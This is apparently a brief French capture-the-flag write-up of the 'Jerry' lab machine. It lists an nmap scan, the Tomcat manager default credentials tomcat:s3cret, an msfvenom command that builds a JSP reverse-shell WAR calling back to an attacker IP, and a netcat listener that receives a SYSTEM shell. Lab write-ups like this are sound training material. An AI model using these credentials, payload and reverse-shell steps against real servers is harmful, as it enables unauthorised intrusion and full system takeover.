# Jerry `apache tomcat` * Nom machine : Jerry * Difficulté : Facile * OS : Windows ## Enumération ### NMAP ``` Nmap scan report for 10.10.10.95 Host is up, received user-set (0.031s latency). Scanned at 2024-11-04 09:38:29 EST for 1029s Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE REASON 8080/tcp open http-proxy syn-ack Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 1028.55 seconds ``` ### HTTP (8080) : apache tomcat tomcat:s3cret ## Accès initial ``` ┌──(kali㉿kali)-[~] └─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.12 LPORT=1234 -f war -o revshell.war Payload size: 1084 bytes Final size of war file: 1084 bytes Saved as: revshell.war ``` WAR file to deploy --> browse ...

/revshell ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 listening on [any] 1234 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system ```